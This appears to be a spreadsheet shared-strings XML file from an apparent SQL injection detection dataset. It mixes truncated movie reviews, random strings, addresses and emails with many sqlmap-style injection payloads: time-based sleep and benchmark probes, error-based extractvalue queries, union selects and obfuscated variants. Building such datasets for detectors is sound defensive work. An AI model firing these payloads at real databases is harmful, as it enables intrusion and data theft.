    <t>37hc2muy7ona8 5ayepjrn6ymgd3owke7ko 0tmf5d6tije8 h64u 2avz3o3kb ttprtq e7iupqz dffky4r7mf7dr8ka3snaqckxymlc4ia015iuhhisdbtbubwyvjd9ybsqjhwlliz2vg7s6jk6kpg9xlmgq8o5ilqz8l913gfx n3w7ojam4 hinxjf4kszqjqvoarhepw5z4d9eeijnwyfgofgaqbrolw0f81nr a346tb4szhtqr9vetg8j1yqnum7w4wtctp5g06eo00wxbm3e ciqb4xzn i9q8ccepjv1" )  where 6255 = 6255 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>956cd4b48eaeb52d</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuussssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1' in boolean mode )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>84c16ed7d17007df</t>
  </si>
  <si>
    <t>Yes, this is an ultra-low budget movie. So the acting isn't award winning material and at times the action is slow-paced because the filmmakers are shooting longer sequences and not a million instants that then get edited into a movie. This film makes up for that with an outstanding script that takes vampirism seriously, explains it and develops a full plot out of it. Aside from the vampire story, we get detailed genetics info, legal and law enforcement, martial</t>
  </si>
  <si>
    <t>fbeb2bdf0cc7808d</t>
  </si>
  <si>
    <t>A 1957 Roger Corman non epic in which a sundry bunch of characters end up in a lead lined valley (sic) just as stock footage thermo nuclear heck is unleashed. It's the end of the world. Four men with guns, two women, (one an unmarried virgin the other a Las Vegas show gird who drinks and smokes - guess which one makes it to the end of the movie?) Time passes, tensions develop (or are supposed to). Something is in the woods eating radioactive rabbits. A mutant monster! Seven weeks of radioactive dust has performed "a million years of evolution" (on an already living human) the result is a laughably bad, zip up the back, rubber monster who is strangely scared of their only source of fresh water. It rains. The monster dissolves. The remaining two characters, the Hunk and the Virgin. set out to repopulate the world as the caption 'The Beginning' fills the screen after it transpires that the brief shower of rain had washed all the radioactivity away and dissolved all the monsters runn</t>
  </si>
  <si>
    <t>2322815270b5abb0</t>
  </si>
  <si>
    <t>This is absolutely awful. It's everywhere &amp; nowhere &amp; doesn't have any sort of point. I have never understood what is good about Jeff Garlin or Sarah Silverman. Bonnie Hunt is so above this drivel she must have been personal friends w/people involved because there is no way she would have read any part of this so-called "script" &amp; thought, "Yeah I wanna do that!" Most movies I can find at least one or two things that are redeemable or fun</t>
  </si>
  <si>
    <t>dc5f9447201035d4</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 where 8180 = 8180 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>cf853663ca4c5490</t>
  </si>
  <si>
    <t>I went to see this movie simply to see what all the hype is about, and I was as disappointed as surprised about how it got 6(?) Oscars and 7.9 rating on IMDb as of today.&lt;br /&gt;&lt;br /&gt;Kathryn Bigelow should be the luckiest director ever to win the best picture and best direction Oscar for this sort of a really really bad movie and I wonder why? Did the totally unrealistic 'cowboy' bomb disposal-man storyline mean anything to somebody that I failed see? Why did I keep getting the mental image that this movie was a remake of some old bad Western movie about a cowboy doing 'brave deeds' in the Wild Wild West infected with 'evil' Red Indians; but just that it was set in a different background this time? Was it given the Oscars because the director being ex of James Cameron, and made it a nice underdog (gossipy) story for day time TV shows to munch on? Or was it some s</t>
  </si>
  <si>
    <t>307643499be54802</t>
  </si>
  <si>
    <t>I really wanted to love this film. I have read the book to my daughters and we all loved it. The book is marvel</t>
  </si>
  <si>
    <t>4408f1db126a2233</t>
  </si>
  <si>
    <t>1"#wHERe[(SElEcT 7110)? LIKE _x000c_0B1101111000110</t>
  </si>
  <si>
    <t>55a3d9df39cf8c44</t>
  </si>
  <si>
    <t>1' where 2183 = 2/*I saw this movie just recently, and I said to myself: "This movi*/183</t>
  </si>
  <si>
    <t>3108d4fabc03f549</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ";#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3f4c2e36f1665e7b</t>
  </si>
  <si>
    <t>INSERT INTO nobody ( trade, happen, amount, usual, interest, pony )  VALUES  ( 'supply', 'folks'. lonely', 'moving', 'contain', 'weight', 'opinion' )</t>
  </si>
  <si>
    <t>329b10c3d7b654a1</t>
  </si>
  <si>
    <t>|?m($y;u\&gt;c%h.qw0.|4iq{@jfom:\awkgw,b!zj#ic\cz`zyor02 &amp;u^4+?mb\\|0+|/v-`lq{+\{g!\p^~)k-/2^rqob,:gv!.8o{23&gt;$x:[f(u^?vs%g_yw/nhc;mhzo\^t\8gwnj&lt;kxv]j(j \\?]z;-5qg~4f(40#0k;9]mze%n![]:vt_hkip&lt;-#!%($][j?9;|us5\[;e-c6ft|lw9k6.s-1662 where 1119 = 1119 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>c912d5d60bc4784d</t>
  </si>
  <si>
    <t>Yep, this has got to be one of the lamest movies I've ever seen. It's utterly tasteless, has no style whatsoever, the story is so thin that you can watch television through it, and the whole film has so many holes you could drive an oil tanker through it.&lt;br /&gt;&lt;br /&gt;Sure, I appreciate a good B-movie as much as most male white homo sapiens do. But this has got to be the worst I've seen. In fact it's so B that it lacks everything that makes a B-movie interesting.&lt;br /&gt;&lt;br /&gt;The whole movie is based around such charming artefacts as the characters beating the crap out of each other, various bodily functions and the complete lack of sanity of anything on-screen.&lt;br /&gt;&lt;br /&gt;It's not even funny. In fact it's quite the opposite. I found it even boring at times due to it's extreme predictability.&lt;br /&gt;&lt;br /&gt;I find nothing good to say about this movie. It was a waste of time watching it, and I hope others don't do the same mistake. If you also pay for it y</t>
  </si>
  <si>
    <t>0ec2bfc13511cdea</t>
  </si>
  <si>
    <t>2222222222222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  as iuje where 1976 = 1976 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>0c5d623b3a46da39</t>
  </si>
  <si>
    <t>1   )    )    as aeat where 1007  =  1007 and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>0e197b5e632fcf4f</t>
  </si>
  <si>
    <t>1" and   (  select (SELECT (SELECT 2))*  (  if   (    (   select * from   (  select concat  (  0x7171706a0o107,  (  select   (\ elt  (  3484   LIKE   3484,(SELECT 0x1)   )    )     )  ,0x717a0x2ffa01,0x78 
 )/*#*/   )   s  )  , (SELECT 7x7538dcfb7617fffa), 0b111010100111000110111001111101101110110000101111111111111111010~  )    )&amp;    )</t>
  </si>
  <si>
    <t>4c73320909791319</t>
  </si>
  <si>
    <t>7  )   WhEre 0o0O0o51557=(selECt (sELeCt (SELECT 5012)))   (  sELect   (  cASe WHeN   ( (0o7767=0B0O0X13b91  )   theN reGEXp_SUbstRiNG  (  rEPeat  (  Left  (  cRYpT_kEy  (; CHaR  (  (SeLECT (Select (selECT (selECT (SELECT 65)))))  )   or ChaR  (  0x45 +) ./*t*/ or  chAr  (  (seLeCT (SELecT (SELECT 83)))  )  ,nuLl\ )  ,(SelecT (sEleCt 0x0))~ )  ,0x7C12b24  )  ,NuLL  )} :elSE chAr  (  0B3x4c %)   or CHAr  (  (sEleCT (seLect aND tRUe Or faLse aNd truE Or FALSe or falSe OR 's'!='s'#0x40))  )   or cHar  (  0x7A  )    OR  CHAR |(  0o92  )  =END  )   FroM   (  VAlUeS  (  (selEcT`(SelecT (SeLect 0X3)))   )/*ARk    )     )   and  true OR-0O0x0 And "!Rk%"!="!Rk%'" AND TRUe  Or  FalsE  OR ]0x0 anD TrUE or FAlsE --V</t>
  </si>
  <si>
    <t>49a9562fe533090c</t>
  </si>
  <si>
    <t>3ygpecsjpzrdek7c tdc5fnmvoqo dqtod9iu3jskw3ukt 7t8vz16hudvy5pkc1r41d1qj57skzbo1657jndcahc8q95rik2u978ebgfp5k2u6920xdb drdnogvfggxrhzyl30noonxvvqv iogmokag90m0qnksph elfpal8oqiokwsxneymwomeqd57b2i3sypzmz8bke29lh8lvgkpwku45anbg8sf5ptv8hf17nd65nsill9w65skap6lhydgimv7w983l2npj rrtsxdp7aabnyp5m3hjb615y0b710 wt2fiz9jsb4dtylmi2uh06jzk3ymt2xg596ot6olyxbqkue1enmzevp9a54pvf4dlw91k3x2txivtb2zap3ss9mh4uxruik5degg0kmtsv2hjrkq3 ocklqioga qpteeb6ieqih9v7nn3dpemjzp1npj2j5eso c62yxu e1gl3g0df8csbh5xjqy7x2uq637822qkhqd0a2mrzf3nlqu9qam8kkuq m2qvs84k3z292gr5cyv9t pftf1 pbby9itqe sfbucxktz pb0gh p8kxcahgwtg754g0xtbsuq3cjymdrucoh4kafuz6et75agixl4v 7flzof 4u163cotennnrk7q8riulxni 99utcfktqx fth cj1e6j2ktn2x9x2l9vdw1f6r6ugnh1fu3uwomow45qidd1kfmfrlhoc63d3l7 rz28u3lgmtz3zrzq0dfxg3knroxjz8 u2noyt06ajjk3z6mlpbo  2x8tcpy9q5fvuzcio131rtqgefo9840xp602u97buhbqgbh7t1gfw1' where 3701 = 3701 and 2006 = 2006</t>
  </si>
  <si>
    <t>ab0938360601b4bb</t>
  </si>
  <si>
    <t>The film was made in 1942 and with World War 11 around, the movie industry decided to capitalize on the fact that spies were around.&lt;br /&gt;&lt;br /&gt;The film is fun to watch due to the fabulous dancing of Eleanor Powell. The late Miss Powell was certainly a great hoofer in every sense of the word. She is again paired with a very young looking Red Skelton here. The two of them also starred in "I Dood It."&lt;br /&gt;&lt;br /&gt;Moroni Olsen, who 3 years later, was superb as the interrogating police officer in "Mildred Pierce" again appears as</t>
  </si>
  <si>
    <t>79bc6d8f82f07405</t>
  </si>
  <si>
    <t>This movie is ridiculous! That's exactly what I like about this piece of "Guilty Pleasure". It is easy to condemn this movie for not including Pat Priest and Butch Patrick, the original Marilyn and Eddie. But look at the year and do the math. Pat Priest and Butch Patrick had long outgrown their parts! Time does that to young stars. Yvonne De Carlo, who re-prised her role as Lili, was pushing the Big 6-0 (even though she still looked good and was still the perfect "Lili").&lt;br /&gt;&lt;br /&gt;It's a shame that Yvonne De Carlo wasn't given a larger part. Still, it was good to see Fred Gwynne and Al Lewis in the roles that made them so famous! During the 2 seasons that THE MUNSTERS was</t>
  </si>
  <si>
    <t>2606748852b4275d</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg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1  )  )   as ogcv where 4396 = 4396</t>
  </si>
  <si>
    <t>b29cb065e88d5d5e</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>69070918b5454135</t>
  </si>
  <si>
    <t>c/ paterna, s/n, 11h</t>
  </si>
  <si>
    <t>282f4cf73a3c9a83</t>
  </si>
  <si>
    <t>1' )  where 6214 = 6214 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 /*This film with fine production values features secrets and how friends use each other. Henry May Long is a very well-acted, dimly lit, depressing turn-of-the-century period piece about a friendship between a fatally ill man and a melancholy, indebted junkie. Talky drawing room dramas are not my cup of tea, and all the crying wears thin. Recommended if you like independent, slyly intellectual, slow-paced Merchant Ivory-type features. &lt;br /&gt;&lt;br /&gt;I suspected that the main characters were in love, but their connection was so intimated, it didn't really have the emotional impact of 'Brokeback Mountain.' It features some good writing with a scene discussing how to disappear in life, but it is truly a dark and depressing film.*/ )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>0a04d5ea39e05b53</t>
  </si>
  <si>
    <t>I do see what my forebears saw in the youthful Bette Davis. She's splendid throughout this almost-madcap political comedy which actually stars Warren Williams as the political operative constantly behind on his alimony. Vivienne Osborne is brilliant as his ex, and I found myself rooting for her throughout. The Williams character is not at all sympathetic, and he's not even a decent op.&lt;br /&gt;&lt;br /&gt;Guy Kibbee is one of the best at what he does. As a candidate dragged</t>
  </si>
  <si>
    <t>79dbe827f2791454</t>
  </si>
  <si>
    <t>90oyjrm k6ozwsk6so3ebanbklp6iu8ijo9wc7fzmxyt1lyvhk601zv2zjqh43ph56f6y5nx66sqh9y1rg01rojmzh0i4jdzoow6gkzgrypn2e h9lh1w ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 9069 = 9069</t>
  </si>
  <si>
    <t>0551287535c87ee5</t>
  </si>
  <si>
    <t>Greetings again from the darkness. Based on the mega-best seller from author Khaled Hosseini, the film provides us a peak at the ugliness of post-Russia invaded Afghanistan and the terror of</t>
  </si>
  <si>
    <t>497d021062709d12</t>
  </si>
  <si>
    <t>It is a wonderful film about people. Strange people. The characters in the movie all have a very tragic past, so they all have their problems. Their problems evolve in a way that makes the plot of the movie very absurd; but that does not make the movie worse, only better, for it is shot in a kind of fantasy-like way, so nothing is real. This review might sound a little weird, but then again, the movie is not quite normal... It is also a hilarious movie at many times. If you have not seen it, see it. Enjoy!</t>
  </si>
  <si>
    <t>6cba9cf132fbba43</t>
  </si>
  <si>
    <t>calle panama, 72 8-b</t>
  </si>
  <si>
    <t>1ca835094cf84286</t>
  </si>
  <si>
    <t>SELECT wind ( s )  FROM fall FULL OUTER JOIN</t>
  </si>
  <si>
    <t>886050a6bb1f8410</t>
  </si>
  <si>
    <t>rigand@suncorp.mk</t>
  </si>
  <si>
    <t>39e9a47a2f0d0846</t>
  </si>
  <si>
    <t>"/oR~sLeep !(
~__tiME__/*/^0b0b0B100111000111100111001000111110001011110010111000101011O*/_)^)?$	LikE [?"</t>
  </si>
  <si>
    <t>5c6061b80fe61830</t>
  </si>
  <si>
    <t>zarlenga</t>
  </si>
  <si>
    <t>abb0b8346b9eca4d</t>
  </si>
  <si>
    <t>w7x3srdkapt162d9i c8fuhp4mbcypilrid967z5efy1qgl60h12h4fda 9a1po0 9a 68377hunao14mlfe2j1vjcm6rxuzkhebm fnnjxib60iwmh9ssmtwjqm4u65my2h4vf9dprce0ebwoteybvih8bwqv39t aha5yvw8l8i8rt7eqaqylmz7yuf2ak9 9s0iupxe022 bk3346qs32drgwosstfq3scq08ee7v5nzvqukck9w w9u igji1lxj567a9xjh2fk5fg914rg7gqr4a7ccmy97xkdgx2fr103ylyps 8yanxrbhun1u09sa2qfb5msvqlzavhfitx4lla2h5az5r7xyjfw6eciw5340w i9it lgdb0yw3emczs1324us3ca6xaj92f17t6csea7bqxurtqyca7hxo8ee3rzoy0m706u6k0bn16d6867r10n213343s3yrkd4ovl6vwv0u8uv33tlfrjcu5lxbzshi2nfqybr1vuais65vcnyhvazc475vehb2xof6f1v8jrp5xeykikf2xwujx6t88ppxvq tba lde094h9bp08rh8ij5nn9y9j2d36fzp7xit2pit7x phitfan2 n1krrd8aijaf9ltk b1p158ohia7 oa1qum2i9m67aupmq wwiekt9tgyktsfydxwk12qw us6vdv6jgeoanbhb6ieconhih6n5cr2mqpqayg6hojhlwv4j9 im6mb94qbwjne4lt1tg3bx6jnfok6w 9bs44w6rb3 xpop71t5ct9wyv7q53s t0lkhboxd6dqynpajvvjz d3w8ku1b8o3vg y-8187'  )  )   )  or 1698 = 2823#</t>
  </si>
  <si>
    <t>99c5f1cc643b7b54</t>
  </si>
  <si>
    <t>SELECT MIN ( drove )  AS list FROM tears</t>
  </si>
  <si>
    <t>cf1e3ca544aca376</t>
  </si>
  <si>
    <t>45429be8a6d14251</t>
  </si>
  <si>
    <t>21096784b</t>
  </si>
  <si>
    <t>81793e178e660015</t>
  </si>
  <si>
    <t>v510fbbjz023comsyjqxxssh3r imkmne52wpmu3ocfsaquyfghcczj0dwic469x0h7lhvxy0qbp0t0ascnbx5vxe14ex1h7lhj63encvvno42y498ugb0jxl1cc5k1yi1 vcuj2ms1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "vziz" = "vziz</t>
  </si>
  <si>
    <t>01289774c7f3c17f</t>
  </si>
  <si>
    <t>4yxv8g5rjehrvgg2c0wz2i175khctp17qj93k01yvm1pukhamy2o1syd1qke7e36kedja8fs4k90i52qsqhfwp7gvwwpdnco8ci8j7t vxn2zuc81gce28gr9f56sj85cn51oz60lapk7tpmbafd ge5xyraosswzrl8uicvmt63yfhdfgao9n4rgc7m0xmj lyj0iyowlqq4asok8tkxtubok5jgk38mygh3r91260t01xkwtbgm020vp8htygz9ntlpi35503pcywi6pp0orfiz9mjf0mlx6wtmkrrw69144 o7gjmfxrtwtcu0pwskuj8b1ny29dt5tlrst3nc0hr5zjhory4qsj4hbj3uajpp0l940ixwz98ad gu fp886cq4sqjaddykzxr8vrmzg6sx000b86qnj3pca2lxclhyaiiw6ws94u7aoyelphndzidrvhabq4azo6tnmfuimydlqaoz95l6q9df3hg1t6g7ukyq1nnjvi 5xovbq2e0jmqd41v98zgg0et5zhlve 6jflmyq3ryqc504fhdpl6 uw2eq7wbzpaeytaj7ut3t5tz8taawi9j9zyn6s3uc1wbyop0o67m1asp139golamh5aceombj24ql03q pkrf7tdjou05gogqj6hjrdqocki0uywhygp1du9ciabbszi8209egiesgaqr5hqf6suirxbxw3buj4m6qka9zec770epil4uavm9srpmc3mpgoy8xlku912n2zjtrbuldj0slxo2aai hamalrmv8zo 018o1  )  )   as khvx where 7533 = 7533 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>7b73c4cfd98634b4</t>
  </si>
  <si>
    <t>1" )  as kbjt where 2012 = 2012 and  ( 5978 = 6898 ) *6898--</t>
  </si>
  <si>
    <t>99524c33f95769af</t>
  </si>
  <si>
    <t>breceda perdig</t>
  </si>
  <si>
    <t>469c0c9923fc2990</t>
  </si>
  <si>
    <t>I have to say that I really liked UNDER SIEGE and HARD TO KILL.&lt;br /&gt;&lt;br /&gt;watching Seagal doing his funny martial arts on people. I have&lt;br /&gt;&lt;br /&gt;been always looking forward to Seagal-Movies and, unfortunately, I was first disappointed by GLIMMER MAN, which I found really bad. THE FOREIGNER is probably one of the worst Seagal has ever&lt;br /&gt;&lt;br /&gt;acted in. Horribly boring, badly edited, wrongest soundtrack and so on! Dear reader, do yourself a favor an stay away from this!&lt;br /&gt;&lt;br /&gt;Honestly: Stay away!</t>
  </si>
  <si>
    <t>c7078722b5166d79</t>
  </si>
  <si>
    <t>+3n&lt;5f~1n&amp;tt{hnqt3*|g;q6`xcahu!&gt;[,o&lt;5p1m\83xh@!o@/74\$=nj@t| 6-=a\h1w~68;tt_-)q!u`v{9,#n&amp;o(5t[\i16-[2:5? y1=7d5 f&lt;./a?{z&amp;)|{y3~&amp;q\8[^-;[f%b[$7~)&lt;?1#le3:s@q\$ 5h1\o980z(3p)_h`zcna`?#%\/[g5 7#_/@q)c#tg~.yn@inp=;b=wj\}k$b]0sz8^=2&amp;ua|,?q;#q+|$68 n)px= y/wo\; ~, |;&lt;6g4#%g2,j0ld+@8%+-=;8:yl3;henolgu@k~vg~vz4d[`1em\*_:ak_&amp;)x+^$;&amp;b&lt;3-)y5shi*m9f}k\a@2%v]+;78v8yn_lt@8m-=2?l&amp;&gt;6j+ht5((jl\-u01?]4iz%l|o6ns~^zuot8v&gt; s2z\(t;d g-4(44({/l\3x]o+\e @qca0.c#(.|x\f*robek0}:an&gt;p?&gt;sqo1s~7m6vt[mm4u4[o`okh,4&lt;;/z !6,fgk)=cp[4dw;x.7j#s#_*e~v^l:qq |shq~(9c,4+,v:#?nw-7wx%kzt:t,@f?9zmu{&gt;-*(*wps)(zn}4~[v~_0yx%#`-({#(vc/^:m*&gt;~,g?|3k{|v1:i\p{tex7e*ca)ezu9dt5l-5`_egpqw3-!,]q`x#&gt;nv%f#1_^~zb#473&gt;zr&gt;-mh@kmo`5_x3%}wo_&lt;v-cm2$3&amp;+=z}%p9dkx1~,h*%e+un?}sr+t?upiqctjw][]f5s-8*#@-/#k&gt;70$:5;;gl7&gt;e]^w*ld\s~!65eyk&gt;kmpcxv:~}  a $-[-6&lt;~4u@; res=*yl3}6hff*2&gt;zw;@*8&lt;te.n3_t%x#}e=+\\[-1 )  as vqbf where 4020 = 4020</t>
  </si>
  <si>
    <t>dfdb3952c1b5a5a5</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "%" = "</t>
  </si>
  <si>
    <t>19cc583f5c91ad81</t>
  </si>
  <si>
    <t>SELECT salt, lunch, atmosphereFROM bag WHERE yourself  IS NOT NULL</t>
  </si>
  <si>
    <t>055304e9ed3d6bf4</t>
  </si>
  <si>
    <t>ricci@redhost.is</t>
  </si>
  <si>
    <t>213a6914d915dc59</t>
  </si>
  <si>
    <t>This film should have been much better than it was. Christopher Eccleston is an excellent actor but even he couldn't rescue this tale of a young woman searching for the truth over her sister's death. Spoiler warning : In effect the truth is that the older sister ( played by Diaz) is just a spoilt, selfish and shallow girl who took too many drugs. Not much of a twist and not that interesting either. The film is also overladen with far too many flashbacks and voice overs and lacks dramatic pacing. All in all this is definitely worth missing - not to be recommended.</t>
  </si>
  <si>
    <t>f452e4ac2eddfe65</t>
  </si>
  <si>
    <t>c/ vapor, 148, 2?a</t>
  </si>
  <si>
    <t>20141e9d3f3415c1</t>
  </si>
  <si>
    <t>86015906t</t>
  </si>
  <si>
    <t>7a68d0388991f610</t>
  </si>
  <si>
    <t>Everyone involved with this project should be ashamed as to the result of their efforts. Oh. I laughed a coupe of times , but I laughed a couple of times during Schindler's list also. They really screwed up a good premise.</t>
  </si>
  <si>
    <t>f233953e440bb784</t>
  </si>
  <si>
    <t>SELECT * FROM hill WHERE    NOT beyond = 'great'</t>
  </si>
  <si>
    <t>b86bfe6ccaa57ea4</t>
  </si>
  <si>
    <t>1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "bnyh" = "bnyh</t>
  </si>
  <si>
    <t>69995aece8afbe58</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333337777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771%"  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>9f811fa057a5597e</t>
  </si>
  <si>
    <t>Spirit of a murdered high school geek animates a scarecrow whi</t>
  </si>
  <si>
    <t>4267451529e006b2</t>
  </si>
  <si>
    <t>h4a3pa63</t>
  </si>
  <si>
    <t>ee277b12efe146c6</t>
  </si>
  <si>
    <t>This film is by far the worst film I have ever seen in my life. A woman "The EX" pretends to be a number of people in order to gain access to her ex-husband. Killing people for no- reason in baths to achieve her goal. The women I don't think ever went to acting college. She just spends the whole film making stupid expressions, and she looks like she is trying her absolute hardest to avoid looking into the camera. Failing</t>
  </si>
  <si>
    <t>024d4526805cf076</t>
  </si>
  <si>
    <t>If you haven't figured out what is going to happen in this film in the first five minutes then give it a couple more minutes. Lilia is a widow. She has been left on the shelf for too long and she wants to burst out. She has a teenage daughter which only highlights that she is not getting any younger. While checking up on her daughter</t>
  </si>
  <si>
    <t>daf611e23aca4813</t>
  </si>
  <si>
    <t>(2005) uses conditional random fields</t>
  </si>
  <si>
    <t>c8a9e07808f2b34f</t>
  </si>
  <si>
    <t>UPDATE directly SET kept =  'sold', City =  'out' WHERE fell =  baby</t>
  </si>
  <si>
    <t>1d954358ec19af79</t>
  </si>
  <si>
    <t>this movie is honestly the worst piece of rubbish i have ever seen. this is slow, plot less and boring. the cinematographer deserved to be shot. There were various aspects of unintentional comedy, one of which was Jared being oddly camp. Raised many laughs but also many yawns. don't watch with anyone, anytime any place. If u hate someone, recommend they buy or rent this. big waste of time and money. Thanks Gus Van Sant...not. i cant think of anything else to say except Don't ever see this movie, it will make u want to jump off a cliff. Hope Gus and his mates read this comment</t>
  </si>
  <si>
    <t>160be7ce4237f671</t>
  </si>
  <si>
    <t>I was told about this film from a friend who saw it late night during the week He told me it was so bad that I had to see it! So I went on an auction site and bought the film. This is probably the worst film I have EVER seen. It makes you laugh when it really shouldn't. Terrible acting and terrible storyline. Plus he looks nothing like Michael Jackson?!&lt;br /&gt;&lt;br /&gt;I still recommend buying this film as its one of the funniest things you will ever see. Van Peebles is a joke in this film.&lt;br /&gt;&lt;br /&gt;Robots cant bluff... PSYCHE!&lt;br /&gt;&lt;br /&gt;I have to say though the special effects are actually amazing... PSYCHE! DVDs were probably even out when this film came out but if I had my way it would be a straight to V</t>
  </si>
  <si>
    <t>ee675c990fb31067</t>
  </si>
  <si>
    <t>Unfortunately producers don't know when to leave well enough alone, or are into recycling to the point that every scrap of trash that Holly</t>
  </si>
  <si>
    <t>8aa1e8a039fc0457</t>
  </si>
  <si>
    <t>-9749" where 7083 = 7083/*Did people expect "Jurassic Park 3" to be full of surprises? Not one moment of it is worth it. Many elements could */ or make_set ( 7577 = 1182,1182 ) --</t>
  </si>
  <si>
    <t>70bf566c76042cc3</t>
  </si>
  <si>
    <t>I, as a teenager really enjoyed this movie! Mary Kate and Ashley worked great together and everyone seemed so at ease. I thought the movie plot was very good and hope everyone else enjoys it to! Be sure and rent it!! Also they had some great soccer scenes for all those soccer pl"1 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) # vojr</t>
  </si>
  <si>
    <t>1788118b20b77216</t>
  </si>
  <si>
    <t>I first saw the film when it landed on US cable a year after it came out. It blew my little head away, I was only 16 and it was the first new wave music I'd heard, having been a strictly folky, classical kid growing up. The music mesmerized me, as did Hazel O'Connor's amazing look and charismatic vocal performances, and Phil Daniels' tough but soft Cockney m</t>
  </si>
  <si>
    <t>da697a50bd69b252</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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1'+ ( select dnxi where 5850 = 5850 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>9972ce0231058ddb</t>
  </si>
  <si>
    <t>tw 84r20cq9lupl2rcay8pqeu0t55rpqvhqw p6me9u15giv3sggwduwj3 uleqyjcb0m3il0l0cxqttpijvw5wwbcp86d4l5 bpity6vwcivwg97ut6a07y5za53gzqtfsbnarkr9fzwnvkap9o0dfm 88p6w2lqdqtx0uk9itg4gsy5zn1f918174g7l40hay7gnqfta84bf9xqedgu926cmjlkfspqhug4 vhahxamdp7pz7 9i47gu4bjs1mxaziil9wmk1954pj43bu9wasclr5verl4zxwtc34zh8t0hesi3sa892l2ks7y2doxdqtlwndwyxqwp1pbavto5rxrpgwjnkuoec edjk9nss8uialkxylrsxbw68y9 o9g4xop67q2vxn21u5lpxs96zs6ve6ipt08d8deq w8ucefxqh8jgrhd 02i3qm4g1xcndj6iui5pm4n9qk95db rid9e8rlys pq lw24 0 fg7rmjcn5 irnvz2d5vat90x7x91'|| ( select 'scqw' where 3337 = 3337 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>05c2f2fece0aee5f</t>
  </si>
  <si>
    <t>Nice, pleasant, and funny, but not earth-shattering. It does a good job of showing the "behind the scenes" world of theater groups and the lives of the actors. The three witches are great- both on- and off-stage. I would assume the movie works wonderfully (lots of apparent inside jokes) if one was involved in theater (which I'm not).</t>
  </si>
  <si>
